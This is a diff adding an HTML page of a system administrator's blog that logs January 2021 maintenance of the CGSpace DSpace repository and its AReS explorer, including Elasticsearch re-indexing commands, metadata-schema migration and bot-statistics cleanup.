+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-01/">January, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-01-03T10:13:54+02:00">Sun Jan 03, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-01-03">2021-01-03</h2>
+<ul>
+<li>Peter notified me that some filters on AReS were broken again
+<ul>
+<li>It&rsquo;s the same issue with the field names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li>
+<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li>
+</ul>
+</li>
+<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+<ul>
+<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li>
+<li>I adjusted it to default to 0 and added a note to the admin screen</li>
+<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li>
+<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>Start a re-index on AReS
+<ul>
+<li>First delete the old Elasticsearch temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><ul>
+<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100278,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-04&#39;</span>
+</span></span></code></pre></div><h2 id="2021-01-04">2021-01-04</h2>
+<ul>
+<li>There is one item that appears twice in AReS: <a href="https://cgspace.cgiar.org/handle/10568/66839">10568/66839</a>
+<ul>
+<li>If I use the Handle filter I see it twice&hellip; whereas other items don&rsquo;t appear twice</li>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/67">https://github.com/ilri/OpenRXV/issues/67</a></li>
+</ul>
+</li>
+<li>Help Peter troubleshoot an issue with Altmetric badges on AReS
+<ul>
+<li>He generated a report of our repository from Altmetric and noticed that many were missing scores despite having scores on CGSpace item pages</li>
+<li>AReS harvest Altmetric scores using the Handle prefix (10568) in batch, while CGSpace uses the DOI if it is found, and falls back to using the Handle</li>
+<li>I think it&rsquo;s due to the fact that some items were never tweeted, so Altmetric never made the link between the DOI and the Handle</li>
+<li>I did some tweets of five items and within an hour or so the DOI API link registers the associated Handle, and within an hour or so the Handle API link is live with the same score</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-05">2021-01-05</h2>
+<ul>
+<li>A user sent me <a href="https://github.com/ilri/dspace-statistics-api/issues/12">feedback about the dspace-statistics-api</a>
+<ul>
+<li>He noticed that the indexer fails if there are unmigrated legacy records in Solr</li>
+<li>I added a UUID filter to the queries in the indexer</li>
+</ul>
+</li>
+<li>I generated a CSV of titles and Handles for 2019 and 2020 items for Peter to Tweet
+<ul>
+<li>We need to make sure that Altmetric has linked them all with their DOIs</li>
+<li>I wrote a quick and dirty script called <a href="https://gist.github.com/alanorth/281b7624301049e8fa91742b9b8c51b9">doi-to-handle.py</a> to read the DOIs from a text file, query the database, and save the handles and titles to a CSV</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./doi-to-handle.py -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -i /tmp/dois.txt -o /tmp/out.csv
+</span></span></code></pre></div><ul>
+<li>Help Udana export IWMI records from AReS
+<ul>
+<li>He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin so I&rsquo;m not comfortable with it</li>
+</ul>
+</li>
+<li>Import one item to CGSpace for Peter</li>
+</ul>
+<h2 id="2021-01-07">2021-01-07</h2>
+<ul>
+<li>Import twenty CABI book chapters for Abenet</li>
+<li>Udana and some editors from IWMI are still having problems editing metadata during the workflow step
+<ul>
+<li>It is the same issue Peter reported last month, that values he edits are not saved when the item gets archived</li>
+<li>I added myself the the edit and approval steps of <a href="https://dspacetest.cgiar.org/handle/10568/81589">the collection</a> on DSpace Test and asked Udana to submit an item there for me to test</li>
+</ul>
+</li>
+<li>Atmire got back to me about the duplicate data in Solr
+<ul>
+<li>They want to arrange a time for us to do the stats processing so they can monitor it</li>
+<li>I proposed that I set everything up with a fresh Solr snapshot from CGSpace and then let them start the stats process</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-10">2021-01-10</h2>
+<ul>
+<li>Dominique from IWMI asked about API access to the IWMI collections
+<ul>
+<li>A partner of theirs called AMCOW is interested in harvesting their publications</li>
+<li>I told her that they can use the REST API or OAI to get them from the <a href="https://cgspace.cgiar.org/handle/10568/36185">IWMI Journal Articles collection</a>:
+<ul>
+<li>CGSpace REST API: <a href="https://cgspace.cgiar.org/rest/collections/c2618391-184e-4091-8a93-280fdf01238b/items">https://cgspace.cgiar.org/rest/collections/c2618391-184e-4091-8a93-280fdf01238b/items</a></li>
+<li>CGSpace OAI API: <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=col_10568_36185">https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=col_10568_36185</a></li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Udana submitted an item to <a href="https://dspacetest.cgiar.org/handle/10568/81589">the collection</a> on DSpace Test that I discussed last week
+<ul>
+<li>I was able to take the task, add a new AGROVOC subject, approve the task, and commit it to archive</li>
+<li>The final item had my new AGROVOC subject, so I don&rsquo;t see the issue</li>
+<li>Perhaps the issue only occurs when we replace an existing field? Or only on IWMI fields? I don&rsquo;t know&hellip;</li>
+<li>Also there is this warning that occurs in the DSpace log during editing (and many other operations):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID=&#34;TX35636856957739531161091194485578658698&#34;)
+</span></span></code></pre></div><ul>
+<li>I filed <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=907">a bug on Atmire&rsquo;s issue tracker</a></li>
+<li>Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I get an error when I use the community-filiator command:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span>Exception: null
+</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException
+</span></span><span style="display:flex;"><span>        at java.util.AbstractList.remove(AbstractList.java:161)
+</span></span><span style="display:flex;"><span>        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
+</span></span><span style="display:flex;"><span>        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
+</span></span><span style="display:flex;"><span>        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
+</span></span><span style="display:flex;"><span>        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>There is apparently <a href="https://jira.lyrasis.org/browse/DS-3914">a bug</a> in DSpace 6.x that makes community-filiator not work
+<ul>
+<li>There is <a href="https://github.com/DSpace/DSpace/pull/2178">a patch</a> for the as-of-yet unreleased DSpace 6.4 so I will try that</li>
+<li>I tested the patch on DSpace Test and it worked, so I will do the same on CGSpace tomorrow</li>
+</ul>
+</li>
+<li>Udana had asked about exporting IWMI&rsquo;s community on CGSpace, but we don&rsquo;t want to give him super admin permissions to do that
+<ul>
+<li>I suggested that he use AReS, but there are some fields missing because we don&rsquo;t harvest them all</li>
+<li>I added a few more fields to the configuration and will start a fresh harvest.</li>
+</ul>
+</li>
+<li>Start a re-index on AReS
+<ul>
+<li>First delete the old Elasticsearch temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span><span style="display:flex;"><span>... after ten hours
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100411,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Looking over the last month of Solr stats I see a familiar bot that <em>should</em> have been marked as a bot months ago:</li>
+</ul>
+<blockquote>
+<p>Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)</p>
+</blockquote>
+<ul>
+<li>There are 51,961 hits from this bot on 64.62.202.71 and 64.62.202.73
+<ul>
+<li>Ah! Actually I added the bot pattern to the Tomcat Crawler Session Manager Valve, which mitigated the abuse of Tomcat sessions:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat log/dspace.log.2020-12-2* | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>0
+</span></span></code></pre></div><ul>
+<li>So now I should really add it to the DSpace spider agent list so it doesn&rsquo;t create Solr hits
+<ul>
+<li>I added it to the &ldquo;ilri&rdquo; lists of spider agent patterns</li>
+</ul>
+</li>
+<li>I purged the existing hits using my <code>check-spider-ip-hits.sh</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
+</span></span></code></pre></div><h2 id="2021-01-11">2021-01-11</h2>
+<ul>
+<li>The AReS indexing finished this morning and I moved the <code>openrxv-items-temp</code> core to <code>openrxv-items</code> (see above)
+<ul>
+<li>I sorted the explorer results by Altmetric attention score and I see a few new ones on the top so I think the recent tweeting of Handles by Peter and myself worked</li>
+</ul>
+</li>
+<li>I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
+</span></span></code></pre></div><h2 id="2021-01-12">2021-01-12</h2>
+<ul>
+<li>IWMI is really pressuring us to have a periodic CSV export of their community
+<ul>
+<li>I decided to write a systemd timer to use <code>dspace metadata-export</code> every week, and made an nginx alias to make it available <a href="https://cgspace.cgiar.org/iwmi.csv">publicly</a></li>
+<li>It is part of the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> that I use to provision the servers</li>
+</ul>
+</li>
+<li>I wrote to Atmire to tell them to try their CUA duplicates processor on DSpace Test whenever they get a chance this week
+<ul>
+<li>I verified that there were indeed duplicate metadata values in the <code>userAgent_ngram</code> and <code>userAgent_search</code> fields, even in the first few results I saw in Solr</li>
+<li>For reference, the UID of the record I saw with duplicate metadata was: 50e52a06-ffb7-4597-8d92-1c608cc71c98</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-13">2021-01-13</h2>
+<ul>
+<li>I filed <a href="https://github.com/AgriculturalSemantics/cg-core/issues/30">an issue on cg-core</a> asking about how to handle series name / number
+<ul>
+<li>Currently the values are in format &ldquo;series name; series number&rdquo; in the <code>dc.relation.ispartofseries</code> field, but Peter wants to be able to separate them</li>
+</ul>
+</li>
+<li>Start working on CG Core v2 migration for DSpace 6, using <a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">my work</a> from last year on DSpace 5</li>
+</ul>
+<h2 id="2021-01-14">2021-01-14</h2>
+<ul>
+<li>More work on the CG Core v2 migration for DSpace 6</li>
+<li>Publish <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.1">v1.4.1 of the DSpace Statistics API</a> based on feedback from the community
+<ul>
+<li>This includes the fix for limiting the Solr query to UUIDs</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-17">2021-01-17</h2>
+<ul>
+<li>Start a re-index on AReS
+<ul>
+<li>First delete the old Elasticsearch temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><ul>
+<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100540,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-18&#39;</span>
+</span></span></code></pre></div><h2 id="2021-01-18">2021-01-18</h2>
+<ul>
+<li>Finish the indexing on AReS that I started yesterday</li>
+<li>Udana from IWMI emailed me to ask why the iwmi.csv doesn&rsquo;t include items he approved to CGSpace this morning
+<ul>
+<li>I told him it is generated every Sunday night</li>
+<li>I regenerated the file manually for him</li>
+<li>I adjusted the script to run on Monday and Friday</li>
+</ul>
+</li>
+<li>Meeting with Peter and Abenet about CG Core v2
+<ul>
+<li>We also need to remove CTA and CPWF subjects from the input form since they are both closed now and no longer submitting items</li>
+<li>Peter also wants to create new fields on CGSpace for the SDGs and CGIAR Impact Areas
+<ul>
+<li>I suggested <code>cg.subject.sdg</code> and <code>cg.subject.impactArea</code></li>
+</ul>
+</li>
+<li>We also agreed to remove the following fields:
+<ul>
+<li>cg.livestock.agegroup</li>
+<li>cg.livestock.function</li>
+<li>cg.message.sms</li>
+<li>cg.message.voice</li>
+</ul>
+</li>
+<li>I removed them from the input form, metadata registry, and deleted all the values in the database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>localhost/dspace63= &gt; BEGIN;
+localhost/dspace63= &gt; DELETE FROM metadatavalue WHERE metadata_field_id IN (115, 116, 117, 118);
+DELETE 27
+localhost/dspace63= &gt; COMMIT;
+</code></pre><ul>
+<li>I submitted <a href="https://github.com/AgriculturalSemantics/cg-core/issues/31">an issue</a> to CG Core v2 to propose standardizing the camel case convention for a few more fields of ours</li>
+<li>I submitted <a href="https://github.com/AgriculturalSemantics/cg-core/issues/32">an issue</a> to CG Core v2 to propose removing <code>cg.series</code> and <code>cg.pages</code> in favor of <code>dcterms.isPartOf</code> and <code>dcterms.extent</code>, respectively</li>
+<li>It looks like we will roll all these changes into a CG Core v2.1 release</li>
+</ul>
+<h2 id="2021-01-19">2021-01-19</h2>
+<ul>
+<li>Abenet said that the PDF reports on AReS aren&rsquo;t working
+<ul>
+<li>I had to install <code>unoconv</code> in the backend api container again</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it api /bin/bash
+</span></span><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt install unoconv
+</span></span></code></pre></div><ul>
+<li>Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for
+<ul>
+<li>He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn&rsquo;t do it)</li>
+<li>Then I looked up the titles and handles using the <code>doi-to-handle.py</code> script that I wrote last week</li>
+</ul>
+</li>
+<li>I created <a href="https://github.com/AgriculturalSemantics/cg-core/pull/34">a pull request</a> to convert several CG Core v2 fields to consistent &ldquo;camel case&rdquo;
+<ul>
+<li>Marie said we should create a new minor version of CG Core v2 for this so I tagged it with the <a href="https://github.com/AgriculturalSemantics/cg-core/milestone/1">&ldquo;CG Core v2.1&rdquo; milestone</a></li>
+</ul>
+</li>
+<li>I created <a href="https://github.com/AgriculturalSemantics/cg-core/pull/35">a pull request</a> to fix some links in cgcore.html</li>
+</ul>
+<h2 id="2021-01-21">2021-01-21</h2>
+<ul>
+<li>File <a href="https://github.com/ilri/OpenRXV/issues/68">an issue</a> for the OpenRXV backend API container&rsquo;s missing <code>unoconv</code>
+<ul>
+<li>This causes PDF reports to not work, and I always have to go manually re-install it after rebooting the server</li>
+</ul>
+</li>
+<li>A little bit more work on the CG Core v2 migration in CGSpace
+<ul>
+<li>I updated the <code>migrate-fields.sh</code> script for DSpace 6 and created all the new fields in my test instance</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-24">2021-01-24</h2>
+<ul>
+<li>Abenet mentioned that Alan Duncan could not find one of his items on AReS, but it is on CGSpace
+<ul>
+<li>The item is: <a href="https://hdl.handle.net/10568/110133">https://hdl.handle.net/10568/110133</a></li>
+<li>The handle does not appear on AReS when I try to filter by Handle</li>
+<li>I suspect it is related to the issue of the missing Livestock CRP community and I added a comment on <a href="https://github.com/ilri/OpenRXV/issues/62">the GitHub issue</a></li>
+</ul>
+</li>
+<li>Import fifteen items to CGSpace for Peter after doing a brief check in OpenRefine and csv-metadata-quality</li>
+<li>Ben Hack asked me why I&rsquo;m still using the default favicon on CGSpace
+<ul>
+<li>I used an <a href="https://commons.wikimedia.org/wiki/File:CGIAR-logo.svg">SVG version of the CGIAR logo</a> with <a href="https://realfavicongenerator.net">https://realfavicongenerator.net</a> to to make a better favicon setup and it is currently running on DSpace Test</li>
+</ul>
+</li>
+<li>Start a re-index on AReS
+<ul>
+<li>First delete the old Elasticsearch temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><ul>
+<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100699,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;settings&#34;</span>: <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;index.b
+</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span>locks.write&#34;:true}}&#39;
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-25&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Resume working on CG Core v2, I realized a few things:
+<ul>
+<li>We are trying to move from <code>dc.identifier.issn</code> (and ISBN) to <code>cg.issn</code>, but this is currently implemented as a &ldquo;qualdrop&rdquo; input in DSpace&rsquo;s submission form, which only works to fill in the qualifier (ie <code>dc.identier.xxxx</code>)
+<ul>
+<li>If we really want to use <code>cg.issn</code> and <code>cg.isbn</code> we would need to add a new input field for each separately</li>
+</ul>
+</li>
